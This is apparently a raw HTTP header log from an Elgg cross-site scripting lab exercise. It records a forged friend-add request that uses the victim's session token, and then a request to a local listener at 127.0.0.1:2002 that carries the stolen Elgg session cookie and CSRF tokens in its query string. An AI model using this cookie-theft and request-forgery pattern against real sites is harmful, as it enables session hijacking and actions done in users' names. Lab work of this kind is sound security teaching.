http://www.xsslabelgg.com/action/friends/add?friend=39&__elgg_ts=1508441365&__elgg_token=ed48dd2e149b7493efaa0ed7f6fafc7f

GET /action/friends/add?friend=39&__elgg_ts=1508441365&__elgg_token=ed48dd2e149b7493efaa0ed7f6fafc7f HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/alice
Cookie: Elgg=j6fk84knlhmpkfleu4g0hg9ad5
Connection: keep-alive
Upgrade-Insecure-Requests: 1

HTTP/1.1 302 Found
Date: Thu, 19 Oct 2017 19:29:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.26
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.xsslabelgg.com/profile/alice
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------
http://www.xsslabelgg.com/profile/alice

GET /profile/alice HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/alice
Cookie: Elgg=j6fk84knlhmpkfleu4g0hg9ad5
Connection: keep-alive
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Thu, 19 Oct 2017 19:29:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.26
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2733
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
----------------------------------------------------------
http://127.0.0.1:2002/?cookie=Elgg%3Dj6fk84knlhmpkfleu4g0hg9ad5&__elgg_ts=1508441374&__elgg_token=b16a68613afb8d9f621039f316ecbdbb

GET /?cookie=Elgg%3Dj6fk84knlhmpkfleu4g0hg9ad5&__elgg_ts=1508441374&__elgg_token=b16a68613afb8d9f621039f316ecbdbb HTTP/1.1
Host: 127.0.0.1:2002
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/alice
Connection: keep-alive

HTTP/0.9 200 OK
----------------------------------------------------------
